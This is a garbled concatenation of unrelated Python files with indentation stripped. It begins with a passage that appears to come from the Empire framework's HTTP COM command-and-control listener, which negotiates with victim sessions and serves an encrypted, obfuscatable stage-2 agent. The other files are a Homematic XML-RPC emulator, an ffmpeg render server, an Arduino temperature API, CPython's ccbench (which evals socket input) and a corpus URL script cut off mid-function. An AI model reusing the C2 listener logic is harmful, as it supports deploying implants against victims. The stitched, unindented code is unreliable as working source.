sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == 'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
|
vccu.py
|
import os
import time
import logging
import threading
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
import xmlrpc.client
import json
LOG = logging.getLogger(__name__)
LOCAL = "127.0.0.1"
LOCALPORT = 2001
DEVICE_DESCRIPTIONS = "devicetypes/json/device_descriptions.json"
class LockingServerProxy(xmlrpc.client.ServerProxy):
"""
ServerProxy implementation that locks while a request is executing
"""
def __init__(self, *args, **kwargs):
"""
Initialize new proxy for server and get local ip
"""
self.lock = threading.Lock()
xmlrpc.client.ServerProxy.__init__(self, *args, **kwargs)
def __request(self, *args, **kwargs):
"""
Call method on server side
"""
with self.lock:
parent = xmlrpc.client.ServerProxy
# pylint: disable=E1101
return parent._ServerProxy__request(self, *args, **kwargs)
def __getattr__(self, *args, **kwargs):
"""
Magic method dispatcher
"""
return xmlrpc.client._Method(self.__request, *args, **kwargs)
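# Hypothetical usage: proxy = LockingServerProxy("http://127.0.0.1:2001");
# concurrent calls such as proxy.listDevices(...) are then serialized by the lock.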
# Object holding the methods the XML-RPC server should provide.
class RPCFunctions():
def __init__(self):
LOG.debug("RPCFunctions.__init__")
self.remotes = {}
try:
script_dir = os.path.dirname(__file__)
rel_path = DEVICE_DESCRIPTIONS
with open(os.path.join(script_dir, rel_path)) as fptr:
self.devices = json.load(fptr)
except Exception as err:
LOG.debug("RPCFunctions.listDevices: Exception: %s" % err)
self.devices = []
def _askDevices(self, interface_id):
LOG.debug("RPCFunctions._askDevices: waiting")
time.sleep(0.5)
knownDevices = self.remotes[interface_id].listDevices(interface_id)
LOG.debug("RPCFunctions._askDevices: %s" % knownDevices)
t = threading.Thread(name='_pushDevices', target=self._pushDevices, args=(interface_id, ))
t.start()
def _pushDevices(self, interface_id):
LOG.debug("RPCFunctions._pushDevices: waiting")
time.sleep(0.5)
self.remotes[interface_id].newDevices(interface_id, self.devices)
LOG.debug("RPCFunctions._pushDevices: pushed")
def listDevices(self, interface_id):
LOG.debug("RPCFunctions.listDevices: interface_id = %s" % interface_id)
return self.devices
def getServiceMessages(self):
LOG.debug("RPCFunctions.getServiceMessages")
return [['VCU0000001:1', 'ERROR', 7]]
def getValue(self, address, value_key):
LOG.debug("RPCFunctions.getValue: address=%s, value_key=%s" % (address, value_key))
return True
def setValue(self, address, value_key, value):
LOG.debug("RPCFunctions.getValue: address=%s, value_key=%s, value=%s" % (address, value_key, value))
return ""
def init(self, url, interface_id=None):
LOG.debug("RPCFunctions.init: url=%s, interface_id=%s" % (url, interface_id))
if interface_id:
try:
self.remotes[interface_id] = LockingServerProxy(url)
t = threading.Thread(name='_askDevices', target=self._askDevices, args=(interface_id, ))
t.start()
except Exception as err:
LOG.debug("RPCFunctions.init:Exception: %s" % (err))
return ""
class RequestHandler(SimpleXMLRPCRequestHandler):
"""We handle requests to / and /RPC2"""
rpc_paths = ('/', '/RPC2',)
class ServerThread(threading.Thread):
"""XML-RPC server thread to handle messages from CCU / Homegear"""
def __init__(self, local=LOCAL, localport=LOCALPORT):
self._local = local
self._localport = localport
LOG.debug("ServerThread.__init__")
threading.Thread.__init__(self)
# Create proxies to interact with CCU / Homegear
LOG.debug("__init__: Registering RPC methods")
self._rpcfunctions = RPCFunctions()
# Setup server to handle requests from CCU / Homegear
LOG.debug("ServerThread.__init__: Setting up server")
self.server = SimpleXMLRPCServer((self._local, self._localport),
requestHandler=RequestHandler,
logRequests=False)
self._localport = self.server.socket.getsockname()[1]
self.server.register_introspection_functions()
self.server.register_multicall_functions()
LOG.debug("ServerThread.__init__: Registering RPC functions")
self.server.register_instance(
self._rpcfunctions, allow_dotted_names=True)
def run(self):
LOG.info("Starting server at http://%s:%i" %
(self._local, self._localport))
self.server.serve_forever()
def stop(self):
"""Shut down our XML-RPC server."""
LOG.info("Shutting down server")
self.server.shutdown()
LOG.debug("ServerThread.stop: Stopping ServerThread")
self.server.server_close()
LOG.info("Server stopped")
|
main.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import webapp2
import time
import json
import os
import threading
import datetime
from cook import worker as worker # Video render and concat unit
from cook import translate as translate
from convert import jsonhelper as jsonhelper # convert functions about json
from paste import httpserver
import redis
# Global configuration of server environment.
config = {}
config['worker'] = None
config['redis-server'] = os.environ['REDIS_SERVER']
config['redis-server-port'] = '6379'
config['videos-folder'] = '/videos/' # Must have a trailing /
videos_folder = '/videos/' # Must have a trailing /
r = redis.StrictRedis(
host=config['redis-server'], port=config['redis-server-port'], db=0)
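# Redis is used by RedisReporter below to store per-cake render progress
# (cake_uid -> ffmpeg_status).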
def get_single_ffmpeg_cake(fcpcake):
''' Input: a dict object representing an FCP cake.
Returns: a dict object representing an ffmpeg cake.
'''
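# Expected fcpcake fields (as used below): 'cake_uid', 'range_start',
# 'range_end' and 'clips'; each clip carries an 'offset' and a 'video'
# dict with a 'ref' entry, plus optional 'adjust'/'filter' effect keys.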
cake_uid = fcpcake['cake_uid']
cake_range_start = fcpcake['range_start']
cake_range_end = fcpcake['range_end']
layers = []
for each in fcpcake['clips']:
clip_delay_offset = each[
'offset'] # Clip Delay according to the base clip.
layer = {}
layer['resource'] = each['video']['ref'] if '.mp4' in each['video'][
'ref'] else each['video']['ref'] + '.mp4' # G
layer['resource'] = videos_folder + layer['resource']
layer['start'] = cake_range_start - clip_delay_offset # G
layer['end'] = cake_range_end - clip_delay_offset # G
layer['filters'] = [
translate.fcp_effect_to_ffmpeg_filter(every)
for every in each.keys() if 'adjust' in every
]
layer['filters'].extend([
translate.fcp_effect_to_ffmpeg_filter(every)
for every in each.keys() if 'filter' in every
])
layers.append(layer)
return {
'uid': cake_uid,
'layers': layers,
'range_start': cake_range_start,
'range_end': cake_range_end
}
def convert_fcp_to_ffmpeg(grouped_fcp_cakes):
''' convert fcp cakes into ffmpeg cakes '''
ffmpeg_cakes = [
] # The ffmpeg cakes ready to be put in the ffmpeg oven to cook
for each_fcp_cake_obj in grouped_fcp_cakes:
splitted_fcp_cakes = jsonhelper.split_ranges(each_fcp_cake_obj['hash'],
each_fcp_cake_obj)
for each_single_cake in splitted_fcp_cakes:
ffmpeg_cakes.append(get_single_ffmpeg_cake(each_single_cake))
return ffmpeg_cakes
def process_cakes(jsonobj):
fcp_cakes = jsonobj['cakes']
ffmpeg_cakes = convert_fcp_to_ffmpeg(fcp_cakes)
return ffmpeg_cakes
class ScreenReporter(worker.ReportHandler):
def report(self, messageobj):
print '### Report to screen', str(messageobj)
class RedisReporter(worker.ReportHandler):
def report(self, messageobj):
print '### Report to Redis'
r.set(messageobj['cake_uid'], messageobj['ffmpeg_status'])
def render_ffmpeg_cakes(ffmpeg_cakes):
for idx, each_ffmpeg_cake in enumerate(ffmpeg_cakes):
my_h264_worker = worker.RenderWorker(
codecflag='-crf 18 -preset veryfast')
my_h264_worker.add_handler(handler=ScreenReporter('screen_reporter'))
my_h264_worker.add_handler(handler=RedisReporter('redis_reporter'))
check_thread = threading.Thread(target=my_h264_worker.report_progress)
check_thread.setDaemon(True)
check_thread.start()
my_h264_worker.render(each_ffmpeg_cake,
videos_folder + each_ffmpeg_cake['uid'] + '.mp4')
time.sleep(2) # give the reporter thread time to deliver its final report.
# check_thread.join(60) # Let the thread die in 60 seconds anyway
class RenderSingleCake(webapp2.RequestHandler):
def get(self):
try:
jsonstring = self.request.body
payload = json.loads(jsonstring) # json payload
if payload:
ffmpeg_cakes = process_cakes(payload)
ffmpeg_cakes_uid_list = [each['uid'] for each in ffmpeg_cakes]
return_dict = {'ffmpeg_cakes': ffmpeg_cakes_uid_list}
self.response.out.write(json.dumps(return_dict))
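# The cake UIDs are returned to the client right away; the actual ffmpeg
# rendering continues in the background thread started below.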
background = threading.Thread(
target=render_ffmpeg_cakes,
args=(ffmpeg_cakes,),
name="rendering-background-serivce")
background.start()
else:
self.error(400)
self.response.out.write('Payload Empty, Check Your Json.')
except Exception as ex:
self.error(400)
self.response.out.write(type(ex).__name__ + str(ex))
def post(self):
self.get() # delegate to get()
def concat_files(sequence, result_file_name):
my_h264_worker = worker.RenderWorker(codecflag='-crf 18 -preset veryfast')
my_h264_worker.add_handler(handler=ScreenReporter('screen_reporter'))
file_name_list = []
for each in sequence:
real_file_name = each['src'] if '.mp4' in each[
'src'] else each['src'] + '.mp4'
real_file_name = videos_folder + real_file_name
if 'start' not in each:
file_name_list.append(real_file_name)
else: # need to trim
trimed_file_name = '%s-%s-%s.mp4' % (each['src'].split('-')[0],
each['start'], each['end'])
trimed_file_name = videos_folder + trimed_file_name
my_h264_worker.trim(real_file_name, each['start'], each['end'],
trimed_file_name, 30)
file_name_list.append(trimed_file_name)
return my_h264_worker.concat(file_name_list, result_file_name)
class ConcatFiles(webapp2.RequestHandler):
def get(self):
try:
jsonstring = self.request.body
payload = json.loads(jsonstring)
if payload:
sequence = payload['sequence']
now = datetime.datetime.now()
str_now = datetime.datetime.strftime(now, '%Y%m%d-%H%M%S')
result_file_name = 'demo-' + str_now + '.mp4'
success = concat_files(sequence,
videos_folder + result_file_name)
return_dict = {}
return_dict['result_file_name'] = result_file_name
return_dict['success'] = success
self.response.out.write(json.dumps(return_dict))
else:
self.error(400)
self.response.out.write('Payload Empty, Check Your Json.')
except Exception as ex:
self.error(400)
self.response.out.write(type(ex).__name__ + str(ex))
def post(self):
self.get() # delegate to get()
app = webapp2.WSGIApplication(
[
('/app/render', RenderSingleCake),
('/app/concat', ConcatFiles),
],
debug=True,
config=config)
def main():
httpserver.serve(app, host='0.0.0.0', port='8080')
if __name__ == '__main__':
main()
|
slushserver.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import cherrypy
import serial
import io
import threading
import simplejson as json
import os
temperature = [ 0,0,0 ]
def arduinoReceive():
global temperature
serialIn = serial.Serial('/dev/ttyACM0', 9600, bytesize=8, parity='N', stopbits=1, timeout=0)
sio = io.TextIOWrapper(io.BufferedRWPair(serialIn, serialIn))
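# The Arduino is expected to send semicolon-separated readings per line,
# e.g. "1.2;3.4;5.6", matching the three-element temperature list above.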
while True:
line = sio.readline()
if ";" in line:
temperature_temp = line.rstrip().split(";")
try:
temperature = map(float, temperature_temp)
except ValueError:
pass
class SlushServer(object):
@cherrypy.expose
def api(self):
cherrypy.response.headers['Content-Type']= 'application/json'
return json.dumps({"temperature": temperature})
_thread = threading.Thread(target=arduinoReceive)
_thread.setDaemon(True)
_thread.start()
current_dir = os.path.dirname(os.path.abspath(__file__))
conf = {'global': {'server.socket_host': '0.0.0.0',
'server.socket_port': 8080,
'tools.encode.on': True,
'tools.encode.encoding': "utf-8" },
'/index': { 'tools.staticfile.on': True,
'tools.staticfile.filename': os.path.join(current_dir, 'index.html')},
'/static': {'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.join(current_dir, 'static'),
'tools.staticdir.content_types': {'js': 'text/javascript',
'css': 'text/css'}}}
#cherrypy.server.socket_host = "0.0.0.0";
cherrypy.quickstart(SlushServer(), config = conf )
|
ccbench.py
|
# This file should be kept compatible with both Python 2.6 and Python >= 3.0.
from __future__ import division
from __future__ import print_function
"""
ccbench, a Python concurrency benchmark.
"""
import time
import os
import sys
import functools
import itertools
import threading
import subprocess
import socket
from optparse import OptionParser, SUPPRESS_HELP
import platform
# Compatibility
try:
xrange
except NameError:
xrange = range
try:
map = itertools.imap
except AttributeError:
pass
THROUGHPUT_DURATION = 2.0
LATENCY_PING_INTERVAL = 0.1
LATENCY_DURATION = 2.0
BANDWIDTH_PACKET_SIZE = 1024
BANDWIDTH_DURATION = 2.0
def task_pidigits():
"""Pi calculation (Python)"""
_map = map
_count = itertools.count
_islice = itertools.islice
def calc_ndigits(n):
# From http://shootout.alioth.debian.org/
def gen_x():
return _map(lambda k: (k, 4*k + 2, 0, 2*k + 1), _count(1))
def compose(a, b):
aq, ar, as_, at = a
bq, br, bs, bt = b
return (aq * bq,
aq * br + ar * bt,
as_ * bq + at * bs,
as_ * br + at * bt)
def extract(z, j):
q, r, s, t = z
return (q*j + r) // (s*j + t)
def pi_digits():
z = (1, 0, 0, 1)
x = gen_x()
while 1:
y = extract(z, 3)
while y != extract(z, 4):
z = compose(z, next(x))
y = extract(z, 3)
z = compose((10, -10*y, 0, 1), z)
yield y
return list(_islice(pi_digits(), n))
return calc_ndigits, (50, )
def task_regex():
"""regular expression (C)"""
# XXX this task gives horrendous latency results.
import re
# Taken from the `inspect` module
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)', re.MULTILINE)
with open(__file__, "r") as f:
arg = f.read(2000)
def findall(s):
t = time.time()
try:
return pat.findall(s)
finally:
print(time.time() - t)
return pat.findall, (arg, )
def task_sort():
"""list sorting (C)"""
def list_sort(l):
l = l[::-1]
l.sort()
return list_sort, (list(range(1000)), )
def task_compress_zlib():
"""zlib compression (C)"""
import zlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 3
def compress(s):
zlib.decompress(zlib.compress(s, 5))
return compress, (arg, )
def task_compress_bz2():
"""bz2 compression (C)"""
import bz2
with open(__file__, "rb") as f:
arg = f.read(3000) * 2
def compress(s):
bz2.compress(s)
return compress, (arg, )
def task_hashing():
"""SHA1 hashing (C)"""
import hashlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 30
def compute(s):
hashlib.sha1(s).digest()
return compute, (arg, )
throughput_tasks = [task_pidigits, task_regex]
for mod in 'bz2', 'hashlib':
try:
globals()[mod] = __import__(mod)
except ImportError:
globals()[mod] = None
# For whatever reasons, zlib gives irregular results, so we prefer bz2 or
# hashlib if available.
# (NOTE: hashlib releases the GIL from 2.7 and 3.1 onwards)
if bz2 is not None:
throughput_tasks.append(task_compress_bz2)
elif hashlib is not None:
throughput_tasks.append(task_hashing)
else:
throughput_tasks.append(task_compress_zlib)
latency_tasks = throughput_tasks
bandwidth_tasks = [task_pidigits]
class TimedLoop:
def __init__(self, func, args):
self.func = func
self.args = args
def __call__(self, start_time, min_duration, end_event, do_yield=False):
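        # Call self.func repeatedly until `min_duration` has elapsed since `start_time`
        # (or another thread has already signalled completion via `end_event`);
        # return the (iterations, elapsed seconds) measured by this thread.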
step = 20
niters = 0
duration = 0.0
_time = time.time
_sleep = time.sleep
_func = self.func
_args = self.args
t1 = start_time
while True:
for i in range(step):
_func(*_args)
t2 = _time()
# If another thread terminated, the current measurement is invalid
# => return the previous one.
if end_event:
return niters, duration
niters += step
duration = t2 - start_time
if duration >= min_duration:
end_event.append(None)
return niters, duration
if t2 - t1 < 0.01:
# Minimize interference of measurement on overall runtime
step = step * 3 // 2
elif do_yield:
# OS scheduling of Python threads is sometimes so bad that we
# have to force thread switching ourselves, otherwise we get
# completely useless results.
_sleep(0.0001)
t1 = t2
def run_throughput_test(func, args, nthreads):
assert nthreads >= 1
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
end_event = []
if nthreads == 1:
# Pure single-threaded performance, without any switching or
# synchronization overhead.
start_time = time.time()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=False))
return results
started = False
ready_cond = threading.Condition()
start_cond = threading.Condition()
ready = []
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=True))
threads = []
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# We don't want measurements to include thread startup overhead,
# so we arrange for timing to start after all threads are ready.
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
with start_cond:
start_time = time.time()
started = True
start_cond.notify(nthreads)
for t in threads:
t.join()
return results
def run_throughput_tests(max_threads):
for task in throughput_tasks:
print(task.__doc__)
print()
func, args = task()
nthreads = 1
baseline_speed = None
while nthreads <= max_threads:
results = run_throughput_test(func, args, nthreads)
# Taking the max duration rather than average gives pessimistic
# results rather than optimistic.
speed = sum(r[0] for r in results) / max(r[1] for r in results)
print("threads=%d: %d" % (nthreads, speed), end="")
if baseline_speed is None:
print(" iterations/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
LAT_END = "END"
def _sendto(sock, s, addr):
sock.sendto(s.encode('ascii'), addr)
def _recv(sock, n):
return sock.recv(n).decode('ascii')
def latency_client(addr, nb_pings, interval):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
_time = time.time
_sleep = time.sleep
def _ping():
_sendto(sock, "%r\n" % _time(), addr)
# The first ping signals the parent process that we are ready.
_ping()
# We give the parent a bit of time to notice.
_sleep(1.0)
for i in range(nb_pings):
_sleep(interval)
_ping()
_sendto(sock, LAT_END + "\n", addr)
finally:
sock.close()
def run_latency_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--latclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_latency_test(func, args, nthreads):
# Create a listening socket to receive the pings. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
interval = LATENCY_PING_INTERVAL
duration = LATENCY_DURATION
nb_pings = int(duration / interval)
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first ping(s) to arrive before
# unblocking the background threads.
chunks = []
process = run_latency_client(addr=sock.getsockname(),
nb_pings=nb_pings, interval=interval)
s = _recv(sock, 4096)
_time = time.time
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
while LAT_END not in s:
s = _recv(sock, 4096)
t = _time()
chunks.append((t, s))
# Tell the background threads to stop.
end_event.append(None)
for t in threads:
t.join()
process.wait()
sock.close()
for recv_time, chunk in chunks:
# NOTE: it is assumed that a line sent by a client wasn't received
# in two chunks because the lines are very small.
for line in chunk.splitlines():
line = line.strip()
if line and line != LAT_END:
send_time = eval(line)
assert isinstance(send_time, float)
results.append((send_time, recv_time))
return results
def run_latency_tests(max_threads):
for task in latency_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
while nthreads <= max_threads:
results = run_latency_test(func, args, nthreads)
n = len(results)
# We print out milliseconds
lats = [1000 * (t2 - t1) for (t1, t2) in results]
#print(list(map(int, lats)))
avg = sum(lats) / n
dev = (sum((x - avg) ** 2 for x in lats) / n) ** 0.5
print("CPU threads=%d: %d ms. (std dev: %d ms.)" % (nthreads, avg, dev), end="")
print()
#print(" [... from %d samples]" % n)
nthreads += 1
print()
BW_END = "END"
def bandwidth_client(addr, packet_size, duration):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
local_addr = sock.getsockname()
_time = time.time
_sleep = time.sleep
def _send_chunk(msg):
_sendto(sock, ("%r#%s\n" % (local_addr, msg)).rjust(packet_size), addr)
# We give the parent some time to be ready.
_sleep(1.0)
try:
start_time = _time()
end_time = start_time + duration * 2.0
i = 0
while _time() < end_time:
_send_chunk(str(i))
s = _recv(sock, packet_size)
assert len(s) == packet_size
i += 1
_send_chunk(BW_END)
finally:
sock.close()
def run_bandwidth_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--bwclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_bandwidth_test(func, args, nthreads):
# Create a listening socket to receive the packets. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
duration = BANDWIDTH_DURATION
packet_size = BANDWIDTH_PACKET_SIZE
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first packet to arrive before
# unblocking the background threads.
process = run_bandwidth_client(addr=addr,
packet_size=packet_size,
duration=duration)
_time = time.time
# This will also wait for the parent to be ready
s = _recv(sock, packet_size)
remote_addr = eval(s.partition('#')[0])
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
n = 0
first_time = None
while not end_event and BW_END not in s:
_sendto(sock, s, remote_addr)
s = _recv(sock, packet_size)
if first_time is None:
first_time = _time()
n += 1
end_time = _time()
end_event.append(None)
for t in threads:
t.join()
process.kill()
return (n - 1) / (end_time - first_time)
def run_bandwidth_tests(max_threads):
for task in bandwidth_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
baseline_speed = None
while nthreads <= max_threads:
results = run_bandwidth_test(func, args, nthreads)
speed = results
#speed = len(results) * 1.0 / results[-1][0]
print("CPU threads=%d: %.1f" % (nthreads, speed), end="")
if baseline_speed is None:
print(" packets/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
def main():
usage = "usage: %prog [-h|--help] [options]"
parser = OptionParser(usage=usage)
parser.add_option("-t", "--throughput",
action="store_true", dest="throughput", default=False,
help="run throughput tests")
parser.add_option("-l", "--latency",
action="store_true", dest="latency", default=False,
help="run latency tests")
parser.add_option("-b", "--bandwidth",
action="store_true", dest="bandwidth", default=False,
help="run I/O bandwidth tests")
parser.add_option("-i", "--interval",
action="store", type="int", dest="check_interval", default=None,
help="sys.setcheckinterval() value")
parser.add_option("-I", "--switch-interval",
action="store", type="float", dest="switch_interval", default=None,
help="sys.setswitchinterval() value")
parser.add_option("-n", "--num-threads",
action="store", type="int", dest="nthreads", default=4,
help="max number of threads in tests")
# Hidden option to run the pinging and bandwidth clients
parser.add_option("", "--latclient",
action="store", dest="latclient", default=None,
help=SUPPRESS_HELP)
parser.add_option("", "--bwclient",
action="store", dest="bwclient", default=None,
help=SUPPRESS_HELP)
options, args = parser.parse_args()
if args:
parser.error("unexpected arguments")
if options.latclient:
kwargs = eval(options.latclient)
latency_client(**kwargs)
return
if options.bwclient:
kwargs = eval(options.bwclient)
bandwidth_client(**kwargs)
return
if not options.throughput and not options.latency and not options.bandwidth:
options.throughput = options.latency = options.bandwidth = True
if options.check_interval:
sys.setcheckinterval(options.check_interval)
if options.switch_interval:
sys.setswitchinterval(options.switch_interval)
print("== %s %s (%s) ==" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
# Processor identification often has repeated spaces
cpu = ' '.join(platform.processor().split())
print("== %s %s on '%s' ==" % (
platform.machine(),
platform.system(),
cpu,
))
print()
if options.throughput:
print("--- Throughput ---")
print()
run_throughput_tests(options.nthreads)
if options.latency:
print("--- Latency ---")
print()
run_latency_tests(options.nthreads)
if options.bandwidth:
print("--- I/O bandwidth ---")
print()
run_bandwidth_tests(options.nthreads)
if __name__ == "__main__":
main()
|
get_brwac_urls.py
|
import json
import lxml.etree as ET
from codecs import open
import argparse
from os import listdir
from os.path import isfile, join
from nltk import word_tokenize
from hash_tools import HashTable
def read_brwac_docs(buffer):
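    # Parse every complete <doc>...</doc> block in `buffer` with a recovering XML
    # parser and return (parsed doc elements, unparsed tail after the last </doc>).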
#print(buffer)
last_doc_close_pos = buffer.rindex('</doc>')
buffer_out = buffer[last_doc_close_pos + 6:]
xml = '<root> ' + buffer[:last_doc_close_pos + 6].replace('<g/>', '').replace('\n', ' ').replace('<p>', '').replace('</p>', '\n') + ' </root>'
    parser = ET.XMLParser(encoding="utf-8", recover=True)
tree = ET.fromstring(xml.encode('utf-8'), parser=parser)
docs = tree.findall('doc')
return docs, buffer_out
def search_on_doc(text, web_title, web_text):
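    # Case-insensitive containment check: does `text` occur in the page title or body?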
try:
lower_text = text.lower()
lower_title = web_title.lower()
lower_web_text = web_text.lower()
if lower_text in lower_title or lower_text in lower_web_text:
#print(lower_text)
#print(lower_title)
#if('anno domini' in lower_text):
# print(lower_text)
return True
return False
except:
return False
def search_on_brwac(wiki_ids, wiki_titles, brwac_file_path):
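    # Stream the BrWaC corpus in large buffers; for every document that mentions a
    # Wikipedia article title, record the (non-Wikipedia) source URL and its sentences.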
hash_table = HashTable(200)
wiki_urls = []
for wiki_id in wiki_ids:
wiki_urls.append({'id' : wiki_id, 'urls' : []})
buffer_size = 100000000
total_size = int(22000000000/buffer_size)
with open(brwac_file_path, 'r', encoding="utf-8") as file:
buffer = file.read(buffer_size)
i = 0
while(len(buffer) > 5):
docs, buffer = read_brwac_docs(buffer)
if(docs is not None):
for doc in docs:
for j in range(len(wiki_ids)):
sentences = doc.findall('s')
full_text = ''
ss = []
for sentence in sentences:
ss.append(sentence.text)
full_text = full_text + sentence.text
if(search_on_doc(wiki_titles[j], doc.attrib['title'], full_text)):
if('uri' in doc.attrib):
if('wikipedia' not in doc.attrib['uri']):
if(doc.attrib['uri'] not in wiki_urls[j]['urls']):
#wiki_urls[j]['urls'].append(doc.attrib['uri'])
hash_table.set_val(doc.attrib['uri'], ss)
#print(ss)
wiki_urls[j]['urls'].append(doc.attrib['uri'])
#wiki_urls[j]['texts'].append(doc.text)
buffer = buffer + file.read(buffer_size)
print('{}/{} - buffer size: {}'.format(i, total_size, len(buffer)))
i = i + 1
#if(i==50):
# break
return wiki_urls, hash_table
def main(args):
wiki_titles = []
wiki_ids = []
with open(args.wiki_path + args.wiki_file, 'r', encoding="utf-8") as file:
for line in file:
content = json.loads(line)
wiki_titles.append(content['title'])
wiki_ids.append(content['id'])
brwac_wiki_urls_dicts, hash_table = search_on_brwac(wiki_ids, wiki_titles, args.brwac_file)
with open(args.wiki_urls_output_path + args.wiki_file, 'wb') as out_file:
for wiki in brwac_wiki_urls_dicts:
out_file.write('{}\n'.format(json.dumps(wiki, ensure_ascii=False)).encode('utf-8'))
serialized_urls = []
try:
